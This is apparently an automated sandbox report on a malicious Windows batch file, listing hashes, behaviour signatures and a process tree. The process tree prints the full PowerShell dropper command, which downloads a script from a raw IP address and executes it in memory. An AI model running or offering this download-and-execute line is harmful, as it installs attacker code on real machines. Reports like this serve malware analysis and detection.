Analysis

  • max time kernel
    86s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    09-07-2020 08:10

General

  • Target

    8f9ff3aa474fa163cb2753cdce6a9abc.bat

  • Size

    214B

  • MD5

    6583fe9275827519cd2bad15c56e349c

  • SHA1

    134d9f2a3be2ede4777cd9216538f582570c21e5

  • SHA256

    65aca88b78d41c561c3ab4b732484deb7ba50a7a3b9499406faf938ee12085b8

  • SHA512

    c96021e32ec898f32c0de82016c899052d36358d1e57512c4b4b0875e1507a7862b5837cb4e5e98b2a5726a059a1593749b0839fac788db9c70bfcdd07dea48b

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc

Signatures

  • Suspicious use of WriteProcessMemory 3 IoCs
  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8f9ff3aa474fa163cb2753cdce6a9abc.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3404
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc');Invoke-QAYURDA;Start-Sleep -s 10000"
      2⤵
        PID:3852
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 704
          3⤵
          • Program crash
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious behavior: EnumeratesProcesses
          PID:3028

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3028-1-0x0000000004620000-0x0000000004621000-memory.dmp

      Filesize

      4KB

    • memory/3028-8-0x0000000004B50000-0x0000000004B51000-memory.dmp

      Filesize

      4KB

    • memory/3852-0-0x0000000000000000-mapping.dmp

    • memory/3852-2-0x0000000000000000-mapping.dmp

    • memory/3852-3-0x0000000000000000-mapping.dmp

    • memory/3852-4-0x0000000000000000-mapping.dmp

    • memory/3852-5-0x0000000000000000-mapping.dmp

    • memory/3852-6-0x0000000000000000-mapping.dmp

    • memory/3852-7-0x0000000000000000-mapping.dmp